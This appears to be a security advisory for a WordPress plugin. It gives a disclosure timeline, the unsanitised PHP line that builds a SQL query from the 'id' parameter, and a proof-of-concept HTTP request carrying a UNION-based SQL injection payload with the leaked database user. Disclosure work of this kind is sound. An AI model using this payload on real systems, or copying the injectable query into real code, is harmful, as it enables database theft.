Plugin Details

Disclosure Timeline

• May 9, 2021: Issue Identified and Disclosed to WPScan
• May 13, 2021 : Plugin Closed
• June 10, 2021 : CVE Assigned
• August 22, 2021 : Public Disclosure

Technical Details

Vulnerable File: /includes/forms/display-users-manage-role.php#180

Vulnerable Code block and parameter:

Administrator level SQLi for parameter id /includes/forms/display-users-manage-role.php#180

180:	$display_users_data = $wpdb->get_row( 'SELECT * FROM '.$wpdb->prefix.'display_users WHERE id='.$_GET['id'].'' );

PoC Screenshots

Exploit

GET /wp-admin/admin.php?page=display-users&tab=manage-role&action=edit&id=-4476+UNION+ALL+SELECT+NULL%2Cuser%28%29%2CNULL--+- HTTP/1.1
Host: 172.28.128.50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620460502%7CijOCmlgmjMgoJK3UsTwIOiXIcfoc1SikqZGRE8FZzNF%7C3d7d033b8daf07dedf1e1a8dcd76b6e1e0dcbafe4aaccb82e6746a6aca1573ac; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AiQVT6EvbuCedvp65Wb1%2BuUEl; PHPSESSID=d8f8beced189cdd7cb849dedbb8a8383; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620460502%7CijOCmlgmjMgoJK3UsTwIOiXIcfoc1SikqZGRE8FZzNF%7C7592628b1a41de06805c47e90606ccc7b50c0188ae4783aef3d87442aa29d6f5; wp-settings-time-1=1620287875
Connection: close

	<div class="form-group col-md-10">
			<input type="text" name="title" id="title" class="form-control" value="bob@localhost" />
			<p class="description">
				Please enter here role title.			</p>
		</div>
	</div>